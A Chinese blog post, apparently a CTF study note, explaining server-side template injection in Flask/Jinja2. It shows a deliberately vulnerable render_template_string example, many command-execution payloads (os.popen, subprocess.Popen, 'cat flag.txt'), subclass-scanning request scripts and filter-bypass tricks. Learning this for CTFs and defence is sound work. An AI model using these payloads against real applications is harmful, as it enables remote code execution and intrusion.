<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"flat"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="SSTI简介SSTI 是服务器端模板注入（Server-Side Template Injection）的缩写。它实际上也是一种注入漏洞，通过与服务端模板的输入输出交互，在过滤不严格的情况下，构造恶意输入数据，从而达到读取文件或者getshell的目的。 不同的语言下有不同的框架,不同的框架又有不同模板,不同的语言模板对应的注入点和闭合可能略有区别,但本质原理都是一样的,就是将用户输入的数据不加处">
<meta property="og:type" content="article">
<meta property="og:title" content="SSTI注入的学习">
<meta property="og:url" content="http://example.com/2023/05/09/SSTI%E6%B3%A8%E5%85%A5%E7%9A%84%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="R0ot&#39;s Blog">
<meta property="og:description" content="SSTI简介SSTI 是服务器端模板注入（Server-Side Template Injection）的缩写。它实际上也是一种注入漏洞，通过与服务端模板的输入输出交互，在过滤不严格的情况下，构造恶意输入数据，从而达到读取文件或者getshell的目的。 不同的语言下有不同的框架,不同的框架又有不同模板,不同的语言模板对应的注入点和闭合可能略有区别,但本质原理都是一样的,就是将用户输入的数据不加处">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/68747470733a2f2f692e696d6775722e636f6d2f47565a655671362e706e67.png">
<meta property="og:image" content="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230513175211.png">
<meta property="og:image" content="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230518210329.png">
<meta property="og:image" content="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230518210908.png">
<meta property="og:image" content="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230519204426.png">
<meta property="article:published_time" content="2023-05-09T13:03:01.000Z">
<meta property="article:modified_time" content="2023-07-18T06:34:54.758Z">
<meta property="article:author" content="R0ot">
<meta property="article:tag" content="SSTI">
<meta property="article:tag" content="Python">
<meta property="article:tag" content="Flask">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/68747470733a2f2f692e696d6775722e636f6d2f47565a655671362e706e67.png">

<link rel="canonical" href="http://example.com/2023/05/09/SSTI%E6%B3%A8%E5%85%A5%E7%9A%84%E5%AD%A6%E4%B9%A0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>SSTI注入的学习 | R0ot's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">R0ot's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">分享代码，记录生活</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/05/09/SSTI%E6%B3%A8%E5%85%A5%E7%9A%84%E5%AD%A6%E4%B9%A0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/hearder.jpg">
      <meta itemprop="name" content="R0ot">
      <meta itemprop="description" content="天地不仁,以万物为刍狗">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="R0ot's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SSTI注入的学习
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-05-09 21:03:01" itemprop="dateCreated datePublished" datetime="2023-05-09T21:03:01+08:00">2023-05-09</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-07-18 14:34:54" itemprop="dateModified" datetime="2023-07-18T14:34:54+08:00">2023-07-18</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>13k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>46 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="SSTI简介"><a href="#SSTI简介" class="headerlink" title="SSTI简介"></a>SSTI简介</h1><p>SSTI 是服务器端模板注入（Server-Side Template Injection）的缩写。它实际上也是一种注入漏洞，通过与服务端模板的输入输出交互，在过滤不严格的情况下，构造恶意输入数据，从而达到读取文件或者getshell的目的。</p>
<p>不同的语言下有不同的框架,不同的框架又有不同模板,不同的语言模板对应的注入点和闭合可能略有区别,但本质原理都是一样的,就是将用户输入的数据不加处理就添加在了前端页面上,然后再用模板渲染时,就有可能把用户输入的数据当成本身的语法(和SQL注入一样的),从而导致安全问题</p>
<p>使用模板可以让静态的html页面动态的展示内容,模板是一个响应文本的文件,其中占位符(变量)表示动态部分,告诉模板引擎具体的值需要从使用的数据中获取.使用真实值替换变量,在返回最终得到的字符串,这个程称为渲染</p>
<p>如果先将前端页面渲染,再将用户输入的数据添加在页面上,这样模板已经固定,就不会产生ssti的漏洞了(感觉和SQL的预处理又有点像)</p>
<p>有一个经典的图可以简单的判断是属于的哪一个模板<br><img src="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/68747470733a2f2f692e696d6775722e636f6d2f47565a655671362e706e67.png"><br>红色箭头代表<code>内容</code>未被当做命令执行,绿色代表成功当做命令执行</p>
<span id="more"></span>
<h1 id="Flask框架下的ssti"><a href="#Flask框架下的ssti" class="headerlink" title="Flask框架下的ssti"></a>Flask框架下的ssti</h1><ol>
<li><p><strong>什么是Flask</strong><br>Flask是一个用python编写的轻量级web应用框架,默认使用的是jinja2模板引擎,python可以利用flask框架简单直接的启动一个web服务页面</p>
</li>
<li><p><strong>flask的变量</strong><br><code>&#123;&#123; ... &#125;&#125;</code>：装载一个变量，模板渲染时，会使用传进来的通命名参数将代表的值替换<br><code>&#123;% ... %&#125;</code>：装载一个控制语句<br><code>\&#123;\# ... \#\&#125;</code>：装载一个注释，模板渲染的时候会忽视这个值</p>
</li>
<li><p><strong>造成危险的函数</strong><br>使用jinja2模板有两种渲染方式<code>render_template()</code>和<code>render_template_string()</code><br><code>render_template()</code>是渲染文件的，<code>render_template_string()</code>是渲染字符串的<br>主要会造成ssti漏洞的是<code>render_template_string()</code>,如果传入参数是通过<code>%s</code>的形式获取而非变量取值语句的形式获取,例如,下面的一段代码会存在ssti</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">name= request.args.get(<span class="string">&#x27;name&#x27;</span>)</span><br><span class="line">template = <span class="string">&#x27;&lt;h1&gt;Hello %s!&lt;/h1&gt;&#x27;</span> % name</span><br><span class="line"><span class="keyword">return</span> render_template_string(template, name=name)</span><br></pre></td></tr></table></figure></li>
</ol>
<h2 id="jinja2中的ssti"><a href="#jinja2中的ssti" class="headerlink" title="jinja2中的ssti"></a>jinja2中的ssti</h2><p>在python的jinja2模板引擎中,有许多魔术方法,可以帮我们实现在各个类中的跳转,所有类的最终的父类都是<code>object</code>,也就是说,我们只要任意使用一个类型(比如字符型<code>&#39;&#39;</code>),然后向上找父类,最后就可以通过<code>object</code>到达任意子类<br><strong>流程</strong><br>我们需要找到一个危险类,这个类中有可以执行系统命令的危险函数,我们最终通过这个危险函数来实现命令执行<br>常见危险类<br><img src="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230513175211.png"></p>
<h3 id="相关魔术方法"><a href="#相关魔术方法" class="headerlink" title="相关魔术方法"></a>相关魔术方法</h3><ol>
<li><p><code>__class__</code><br>查找当前类型的所属对象</p>
</li>
<li><p><code>__base__</code><br>找到当前类的上一层父类</p>
</li>
<li><p><code>__mro__[]</code><br>查找当前类的所有继承类,用<code>[]</code>可以指定某一个父类<br>如<code>__mro__[1]</code>和<code>__base__</code>是一样的</p>
</li>
<li><p><code>__subclasses__()[]</code><br>查找当前类的所有子类,用<code>[]</code>可以指定某一个子类</p>
</li>
<li><p><code>__init__</code><br>查看类是否重载,重载是值在程序运行时就已经加载好了这个模块到内存中,如果出现<code>wrapper</code>字眼,说明没有重载</p>
</li>
<li><p><code>__globals__</code><br>寻找当前类所有的方法及变量及参数,以字典的形式输出</p>
</li>
<li><p><code>__builtins__</code><br>是一个内置模块，它包含了 Python 中所有内置的函数和变量。这意味着你可以直接使用这些函数和变量，而不需要导入任何模块<br>例如，如果你在一个模块中定义了一个与内置函数同名的函数，但仍然需要使用内置函数，那么你可以通过访问 <code>__builtins__</code>模块来实现。<br>可以利用这个模块来调用<code>eval()</code>函数,再用<code>eval()</code>函数执行任意命令</p>
</li>
</ol>
<h3 id="危险函数的利用"><a href="#危险函数的利用" class="headerlink" title="危险函数的利用"></a>危险函数的利用</h3><ol>
<li><p><strong>popen</strong><br><code>popen</code>是<code>os</code>模块中的一个函数,可以实现系统命令执行,但是没有回显,要加上<code>.read()</code>才能回显<br><strong>payload:</strong> <code>__globals__[&#39;os&#39;].popen(&#39;ls&#39;).read()</code></p>
</li>
<li><p><strong>eval</strong><br>通过<code>__builtins__</code>模块可以调用<code>eval</code>函数,从而实现任意代码执行<br><strong>payload:</strong><br><code>&#123;&#123;().__class__.__base__.__subclasses__()[编号].__init__['__glo'+'bals__']['__builtins__']['eval']('__import__("os").popen("ls").read()')&#125;&#125;</code></p>
</li>
</ol>
<h3 id="脚本找危险类"><a href="#脚本找危险类" class="headerlink" title="脚本找危险类"></a>脚本找危险类</h3><p>使用脚本可以快速的定位到某个类对应的编号,<code>__subclasses__()[]</code>将编号写入<code>[]</code>内,就可以定位到指定的类中<br><strong>POST传参:</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&#x27;网址&#x27;</span></span><br><span class="line">flag=<span class="string">&#x27;需要查询的类&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">500</span>):</span><br><span class="line">    data=&#123;<span class="string">&quot;search&quot;</span>:<span class="string">&quot;&#123;&#123;().__class__.__base__.__subclasses__()[&quot;</span>+<span class="built_in">str</span>(i)+<span class="string">&quot;]&#125;&#125;&quot;</span>&#125;</span><br><span class="line">    response=requests.post(url=url,data=data)</span><br><span class="line">    <span class="keyword">if</span> response.status_code == <span class="number">200</span>:</span><br><span class="line">        <span class="keyword">if</span> flag <span class="keyword">in</span> response.text:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;+&#x27;</span>+<span class="built_in">str</span>(i))</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;----&#x27;</span>+<span class="built_in">str</span>(i))</span><br></pre></td></tr></table></figure>

<p><strong>GET传参:</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&#x27;网址&#x27;</span></span><br><span class="line">flag=<span class="string">&#x27;需要查询的类&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">500</span>):</span><br><span class="line">    payload=<span class="string">&quot;?search=&#123;&#123;().__class__.__base__.__subclasses__()[&quot;</span>+<span class="built_in">str</span>(i)+<span class="string">&quot;]&#125;&#125;&quot;</span></span><br><span class="line">    newurl=url+payload</span><br><span class="line">    response=requests.get(url=newurl)</span><br><span class="line">    <span class="keyword">if</span> response.status_code == <span class="number">200</span>:</span><br><span class="line">        <span class="keyword">if</span> flag <span class="keyword">in</span> response.text:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;+&#x27;</span>+<span class="built_in">str</span>(i))</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;----&#x27;</span>+<span class="built_in">str</span>(i))</span><br></pre></td></tr></table></figure>

<h3 id="脚本找危险函数"><a href="#脚本找危险函数" class="headerlink" title="脚本找危险函数"></a>脚本找危险函数</h3><p>也可以使用脚本来寻找哪个类中有<code>__builtins__</code>内置模块,然后寻找其中是否有危险函数<br><strong>POST传参:</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&#x27;网址&#x27;</span></span><br><span class="line">flag=<span class="string">&#x27;eval&#x27;</span>  <span class="comment">#需要查询的函数</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">500</span>):</span><br><span class="line">    data=&#123;<span class="string">&quot;search&quot;</span>:<span class="string">&quot;&#123;&#123;().__class__.__base__.__subclasses__()[&quot;</span>+<span class="built_in">str</span>(i)+<span class="string">&quot;].__init__[&#x27;__glo&#x27;+&#x27;bals__&#x27;][&#x27;__builtins__&#x27;]&#125;&#125;&quot;</span>&#125;</span><br><span class="line">    response=requests.post(url=url,data=data)</span><br><span class="line">    <span class="keyword">if</span> response.status_code == <span class="number">200</span>:</span><br><span class="line">        <span class="keyword">if</span> flag <span class="keyword">in</span> response.text:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;+&#x27;</span>+<span class="built_in">str</span>(i))</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;----&#x27;</span>+<span class="built_in">str</span>(i))</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>GET传参:</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&#x27;网址&#x27;</span></span><br><span class="line">flag=<span class="string">&#x27;eval&#x27;</span>  <span class="comment">#需要查询的函数</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">500</span>):</span><br><span class="line">    payload=<span class="string">&quot;?search=&#123;&#123;().__class__.__base__.__subclasses__()[&quot;</span>+<span class="built_in">str</span>(i)+<span class="string">&quot;].__init__[&#x27;__glo&#x27;+&#x27;bals__&#x27;][&#x27;__builtins__&#x27;]&#125;&#125;&quot;</span></span><br><span class="line">    newurl=url+payload</span><br><span class="line">    response=requests.get(url=newurl)</span><br><span class="line">    <span class="keyword">if</span> response.status_code == <span class="number">200</span>:</span><br><span class="line">        <span class="keyword">if</span> flag <span class="keyword">in</span> response.text:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;+&#x27;</span>+<span class="built_in">str</span>(i))</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;----&#x27;</span>+<span class="built_in">str</span>(i))</span><br></pre></td></tr></table></figure>

<h3 id="OS模块执行命令"><a href="#OS模块执行命令" class="headerlink" title="OS模块执行命令"></a>OS模块执行命令</h3><ol>
<li><p><strong>在其他函数中直接调用os模块</strong></p>
<ol>
<li><code>&#123;&#123;self.__dict__._TemplateReference__context.keys()&#125;&#125;</code>显示当前flask有哪些函数和对象</li>
<li>通过<code>config</code>,调用os<br><strong>payload</strong><code>&#123;&#123;config.__class__.__init__.__globals__['os'].popen('ls').read()&#125;&#125;</code></li>
<li>通过<code>url_for</code>,调用os<br><strong>payload</strong><code>&#123;&#123;url_for.__globals__.os.popen('ls').read()&#125;&#125;</code></li>
</ol>
</li>
<li><p><strong>在已经加载os模块的子类里调用os模块</strong><br>脚本查询哪些类中已经加载了os模块,输出编号</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&#x27;网址&#x27;</span></span><br><span class="line">flag=<span class="string">&#x27;os.py&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">500</span>):</span><br><span class="line">    payload=<span class="string">&quot;?search=&#123;&#123;().__class__.__base__.__subclasses__()[&quot;</span>+<span class="built_in">str</span>(i)+<span class="string">&quot;].__init__[&#x27;__glo&#x27;+&#x27;bals__&#x27;]&#125;&#125;&quot;</span></span><br><span class="line">    newurl=url+payload</span><br><span class="line">    response=requests.get(url=newurl)</span><br><span class="line">    <span class="keyword">if</span> response.status_code == <span class="number">200</span>:</span><br><span class="line">        <span class="keyword">if</span> flag <span class="keyword">in</span> response.text:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;+&#x27;</span>+<span class="built_in">str</span>(i))</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;----&#x27;</span>+<span class="built_in">str</span>(i))</span><br></pre></td></tr></table></figure>
<p>在已经加载os模块的子类里调用os模块<br><strong>payload</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;().__class__.__base__.__subclasses__()[编号].__init__.__globals__[<span class="string">&#x27;os&#x27;</span>].popen(<span class="string">&#x27;ls&#x27;</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure></li>
</ol>
<h2 id="一些技巧"><a href="#一些技巧" class="headerlink" title="一些技巧"></a>一些技巧</h2><h3 id="war类执行命令"><a href="#war类执行命令" class="headerlink" title="war类执行命令"></a>war类执行命令</h3><p>直接上<strong>payload</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%<span class="keyword">for</span>(x)<span class="keyword">in</span>().__class__.__base__.__subclasses__()%&#125;&#123;%<span class="keyword">if</span><span class="string">&#x27;war&#x27;</span><span class="keyword">in</span>(x).__name__ %&#125;&#123;&#123;x()._module.__builtins__[<span class="string">&#x27;__import__&#x27;</span>](<span class="string">&#x27;os&#x27;</span>).popen(<span class="string">&#x27;cat flag.txt&#x27;</span>).read()&#125;&#125;&#123;%endif%&#125;&#123;%endfor%&#125;</span><br></pre></td></tr></table></figure>
<p>在所有子类中查找名称中包含“war”的类，然后使用该类的<code>_module</code>属性来访问<code>__builtins__</code>并导入os模块。然后，它使用os.popen函数运行命令cat flag.txt并读取输出。</p>
<h3 id="importlib类执行命令"><a href="#importlib类执行命令" class="headerlink" title="importlib类执行命令"></a>importlib类执行命令</h3><p>先用脚本查找危险类,如果可以找到<code>_frozen_importlib.Builtinlmporter</code>,就可以使用这个类的特性<br>这个类可以加载第三方库,使用<code>load_module</code>加载os模块<br><strong>payload</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;().__class__.__base__.__subclasses__()[编号][<span class="string">&quot;load_module&quot;</span>](<span class="string">&quot;os&quot;</span>)[<span class="string">&quot;popen&quot;</span>](<span class="string">&quot;ls&quot;</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="linecache执行命令"><a href="#linecache执行命令" class="headerlink" title="linecache执行命令"></a>linecache执行命令</h3><p><code>linecache</code>函数可以用于读取任意文件的某一行,由于这个函数中也引入了os模块,使用我们也可以利用这个函数调用os模块从而实现命令执行<br>先用脚本找到危险函数,然后直接引用其中的os即可<br><strong>payload</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;().__class__.__base__.__subclasses__()[编号].__init__.__globals__.linecache.os.popen(<span class="string">&quot;ls&quot;</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<h3 id="subprocess-Popen类执行命令"><a href="#subprocess-Popen类执行命令" class="headerlink" title="subprocess.Popen类执行命令"></a>subprocess.Popen类执行命令</h3><p><code>subprocess.Popen</code>是Python中的一个类，它可以用来产生子进程，并连接到子进程的标准输入&#x2F;输出&#x2F;错误中去，还可以得到子进程的返回值。这个类是从Python2.4版本开始引入的，旨在替代其他几个老的模块或函数，比如：<code>os.system</code>, <code>os.spawn*</code>, <code>os.popen*</code>, <code>popen2.*</code>, <code>commands.*</code><br><strong>payload</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;().__class__.__base__.__subclasses__()[编号](<span class="string">&#x27;ls&#x27;</span>,shell=<span class="literal">True</span>,stdout=-<span class="number">1</span>).communicate()[<span class="number">0</span>].strip()&#125;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="双花括号过滤绕过"><a href="#双花括号过滤绕过" class="headerlink" title="双花括号过滤绕过"></a>双花括号过滤绕过</h3><ol>
<li><strong>基本思路</strong><br>用<code>&#123;% %&#125;</code>代替<code>&#123;&#123; &#125;&#125;</code><br><code>&#123;%%&#125;</code>是flask框架下的控制语句,可以在语句中实现<code>set</code>,<code>if</code>,<code>for</code>等语句,并且是以<code>&#123;% end。。。 %&#125;</code>的形式结尾</li>
<li><strong>寻找编号</strong><br>先上<strong>payload</strong><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%<span class="keyword">if</span>().__class__.__base__.__subclasses__()[<span class="string">&quot;+str(i)+&quot;</span>].__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;ls&#x27;</span>).read()%&#125;OK&#123;% endif %&#125;</span><br></pre></td></tr></table></figure>
将这段代码放在脚本里,如果输出OK就代表成功找到,这个和之前方法没有本质上的区别,之前能用的payload改成这样<code>&#123;%%&#125;</code>的形式还是可以实现,但是还要想办法输出</li>
<li><strong>怎么输出</strong><br>其实要输出也很简单,在控制语句中<code>print</code>,就可以成功输出了<br>例如<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%<span class="keyword">if</span>().__class__.__base__.__subclasses__()[编号].__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;ls&#x27;</span>).read()%&#125;</span><br></pre></td></tr></table></figure>
或者之前的payload加print<br><code>&#123;%print(url_for.__globals__.os.popen('ls').read())%&#125;</code></li>
</ol>
<h3 id="无回显盲注"><a href="#无回显盲注" class="headerlink" title="无回显盲注"></a>无回显盲注</h3><h4 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h4><h4 id="带外注入"><a href="#带外注入" class="headerlink" title="带外注入"></a>带外注入</h4><h4 id="脚本盲注"><a href="#脚本盲注" class="headerlink" title="脚本盲注"></a>脚本盲注</h4><h3 id="中括号过滤绕过"><a href="#中括号过滤绕过" class="headerlink" title="中括号过滤绕过"></a>中括号过滤绕过</h3><ol>
<li><strong>__getitem()__代替[]</strong><br><code>__getitem__()</code>是python的一个魔术方法<br>对字典使用时,括号内代表的是字典的键,返回对应的键值<br>对列表使用时,括号内代表的是列表的索引,返回索引对应的值<br><code>__subclasses__()[编号]</code>等价与<code>__subclasses__().__getitem__(编号)</code></li>
</ol>
